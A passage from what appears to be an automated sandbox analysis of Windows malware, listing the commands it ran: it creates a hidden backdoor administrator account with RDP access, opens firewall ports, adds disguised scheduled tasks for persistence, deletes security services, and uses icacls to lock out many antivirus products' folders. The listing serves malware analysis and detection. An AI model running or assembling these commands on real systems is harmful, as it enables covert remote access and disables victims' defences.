C:\Windows\SysWOW64\timeout.exe
timeout 3
7⤵
- Delays execution with timeout.exe
PID:4916

C:\Windows\SysWOW64\chcp.com
chcp 1251
7⤵
PID:4896

C:\rdp\Rar.exe
"Rar.exe" e -p555 db.rar
7⤵
- Executes dropped EXE
PID:4928

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Rar.exe
7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5044

C:\Windows\SysWOW64\timeout.exe
timeout 2
7⤵
- Delays execution with timeout.exe
PID:4256

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"
7⤵
PID:4336

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "
8⤵
PID:4616

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
9⤵
PID:2092

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
9⤵
PID:4128

C:\Windows\SysWOW64\netsh.exe
netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
9⤵
PID:4368

C:\Windows\SysWOW64\net.exe
net.exe user "john" "12345" /add
9⤵
PID:4240

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user "john" "12345" /add
10⤵
PID:2496

C:\Windows\SysWOW64\chcp.com
chcp 1251
9⤵
PID:4588

C:\Windows\SysWOW64\net.exe
net localgroup "Администраторы" "John" /add
9⤵
PID:2108

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Администраторы" "John" /add
10⤵
PID:4964

C:\Windows\SysWOW64\net.exe
net localgroup "Administratorzy" "John" /add
9⤵
PID:5024

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Administratorzy" "John" /add
10⤵
PID:5088

C:\Windows\SysWOW64\net.exe
net localgroup "Administrators" John /add
9⤵
PID:4688

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Administrators" John /add
10⤵
PID:4784

C:\Windows\SysWOW64\net.exe
net localgroup "Administradores" John /add
9⤵
PID:4948

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Administradores" John /add
10⤵
PID:2408

C:\Windows\SysWOW64\net.exe
net localgroup "Пользователи удаленного рабочего стола" John /add
9⤵
PID:4900

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
10⤵
PID:5012

C:\Windows\SysWOW64\net.exe
net localgroup "Пользователи удаленного управления" John /add
9⤵
PID:4724

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add
10⤵
PID:4280

C:\Windows\SysWOW64\net.exe
net localgroup "Remote Desktop Users" John /add
9⤵
PID:4492

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add
10⤵
PID:4536

C:\Windows\SysWOW64\net.exe
net localgroup "Usuarios de escritorio remoto" John /add
9⤵
PID:3176

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add
10⤵
PID:3140

C:\Windows\SysWOW64\net.exe
net localgroup "Uzytkownicy pulpitu zdalnego" John /add
9⤵
PID:4140

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add
10⤵
PID:4940

C:\rdp\RDPWInst.exe
"RDPWInst.exe" -i -o
9⤵
- Executes dropped EXE
- Modifies WinLogon
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
PID:4364

C:\Windows\SYSTEM32\netsh.exe
netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
10⤵
PID:4100

C:\rdp\RDPWInst.exe
"RDPWInst.exe" -w
9⤵
- Executes dropped EXE
PID:4392

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f
9⤵
PID:3468

C:\Windows\SysWOW64\net.exe
net accounts /maxpwage:unlimited
9⤵
PID:1164

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 accounts /maxpwage:unlimited
10⤵
PID:4308

C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\Program Files\RDP Wrapper\*.*"
9⤵
- Drops file in Program Files directory
- Views/modifies file attributes
PID:2168

C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\Program Files\RDP Wrapper"
9⤵
- Drops file in Program Files directory
- Views/modifies file attributes
PID:2620

C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\rdp"
9⤵
- Views/modifies file attributes
PID:4540

C:\Windows\SysWOW64\timeout.exe
timeout 2
7⤵
- Delays execution with timeout.exe
PID:4324

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat
4⤵
- Drops file in Drivers directory
PID:4992

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST
4⤵
- Creates scheduled task(s)
PID:5112

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDStartUP" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST
4⤵
- Creates scheduled task(s)
PID:4248

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
4⤵
- Creates scheduled task(s)
PID:4448

C:\ProgramData\WindowsTask\update.exe
C:\ProgramData\WindowsTask\update.exe
4⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:4744

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST
2⤵
- Creates scheduled task(s)
PID:3012

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDStartUP" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST
2⤵
- Creates scheduled task(s)
PID:684

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Taskhost" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC ONLOGON /RL HIGHEST
2⤵
- Creates scheduled task(s)
PID:188

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Taskhostw" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 2 /RL HIGHEST
2⤵
- Creates scheduled task(s)
PID:1200

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc start appidsvc
2⤵
- Suspicious use of WriteProcessMemory
PID:3476

C:\Windows\SysWOW64\sc.exe
sc start appidsvc
3⤵
PID:3548

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc start appmgmt
2⤵
- Suspicious use of WriteProcessMemory
PID:2248

C:\Windows\SysWOW64\sc.exe
sc start appmgmt
3⤵
PID:3656

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
2⤵
- Suspicious use of WriteProcessMemory
PID:2128

C:\Windows\SysWOW64\sc.exe
sc config appidsvc start= auto
3⤵
PID:2996

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
2⤵
PID:1168

C:\Windows\SysWOW64\sc.exe
sc config appmgmt start= auto
3⤵
PID:2588

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete swprv
2⤵
PID:3164

C:\Windows\SysWOW64\sc.exe
sc delete swprv
3⤵
PID:4016

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop mbamservice
2⤵
PID:2476

C:\Windows\SysWOW64\sc.exe
sc stop mbamservice
3⤵
PID:416

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
2⤵
PID:3864

C:\Windows\SysWOW64\sc.exe
sc stop bytefenceservice
3⤵
PID:628

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
2⤵
PID:196

C:\Windows\SysWOW64\sc.exe
sc delete bytefenceservice
3⤵
PID:3856

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete mbamservice
2⤵
PID:3736

C:\Windows\SysWOW64\sc.exe
sc delete mbamservice
3⤵
PID:3728

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete crmsvc
2⤵
PID:1280

C:\Windows\SysWOW64\sc.exe
sc delete crmsvc
3⤵
PID:3172

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
2⤵
PID:500

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall set allprofiles state on
3⤵
PID:3116

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
2⤵
PID:2880

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
3⤵
PID:2172

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
2⤵
PID:996

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
3⤵
PID:3768

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
2⤵
PID:3508

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
3⤵
PID:636

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
2⤵
PID:2624

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
3⤵
PID:4124

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)
2⤵
PID:4148

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4236

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
2⤵
PID:4160

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4244

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)
2⤵
PID:4260

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4428

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
2⤵
PID:4276

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4412

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)
2⤵
PID:4304

C:\Windows\SysWOW64\icacls.exe
icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4524

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
2⤵
PID:4440

C:\Windows\SysWOW64\icacls.exe
icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4544

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)
2⤵
PID:4564

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4608

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
2⤵
PID:4628

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4672

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)
2⤵
PID:4696

C:\Windows\SysWOW64\icacls.exe
icacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4832

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
2⤵
PID:4708

C:\Windows\SysWOW64\icacls.exe
icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4824

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)
2⤵
PID:4728

C:\Windows\SysWOW64\icacls.exe
icacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4956

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
2⤵
PID:4848

C:\Windows\SysWOW64\icacls.exe
icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4972

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)
2⤵
PID:4860

C:\Windows\SysWOW64\icacls.exe
icacls c:\programdata\Malwarebytes /deny Admin:(F)
3⤵
- Modifies file permissions
PID:5028

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
2⤵
PID:4984

C:\Windows\SysWOW64\icacls.exe
icacls c:\programdata\Malwarebytes /deny System:(F)
3⤵
- Modifies file permissions
PID:5056

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)
2⤵
PID:5068

C:\Windows\SysWOW64\icacls.exe
icacls C:\Programdata\MB3Install /deny Admin:(F)
3⤵
- Modifies file permissions
PID:1488

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
2⤵
PID:4156

C:\Windows\SysWOW64\icacls.exe
icacls C:\Programdata\MB3Install /deny System:(F)
3⤵
- Modifies file permissions
PID:4184

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)
2⤵
PID:4432

C:\Windows\SysWOW64\icacls.exe
icacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4380

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
2⤵
PID:4468

C:\Windows\SysWOW64\icacls.exe
icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4420

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)
2⤵
PID:4384

C:\Windows\SysWOW64\icacls.exe
icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4520

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)
2⤵
PID:4620

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4644

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)
2⤵
PID:4668

C:\Windows\SysWOW64\icacls.exe
icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4840

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
2⤵
PID:4752

C:\Windows\SysWOW64\icacls.exe
icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4816

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)
2⤵
PID:4740

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:5016

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)
2⤵
PID:4804

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4764

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)
2⤵
PID:5032

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:5076

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)
2⤵
PID:4988

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:5072

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)
2⤵
PID:4300

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4316

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)
2⤵
PID:4344

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4532

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)
2⤵
PID:4296

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:768

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)
2⤵
PID:4212

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:1268

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)
2⤵
PID:3472

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:1196

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)
2⤵
PID:2520

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4548

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)
2⤵
PID:980

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4636

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)
2⤵
PID:4604

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4880

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)
2⤵
PID:4792

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4868

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
2⤵
PID:4796

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4788

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
2⤵
PID:4808

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:5092

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)
2⤵
PID:5064

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:5108

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
2⤵
PID:4168

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4196

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
2⤵
PID:4292

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4172

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
2⤵
PID:4404

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4480

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
2⤵
PID:732

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4388

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
2⤵
PID:4136

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4436

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)
2⤵
PID:1320

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:1276

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)
2⤵
PID:2384

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4464

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)
2⤵
PID:4064

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:3704

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)
2⤵
PID:4944

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:3316

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)
2⤵
PID:4844

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4800

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)
2⤵
PID:5000

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:5084

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)
2⤵
PID:4780

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:5020

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)
2⤵
PID:5116

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4264

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)
2⤵
PID:4996

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4152

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
2⤵
PID:4512

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4192

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)
2⤵
PID:2272

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:1400

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
2⤵
PID:4528

C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
3⤵
- Modifies file permissions
PID:4104

C:\Windows\SysWOW64\cmd.exe
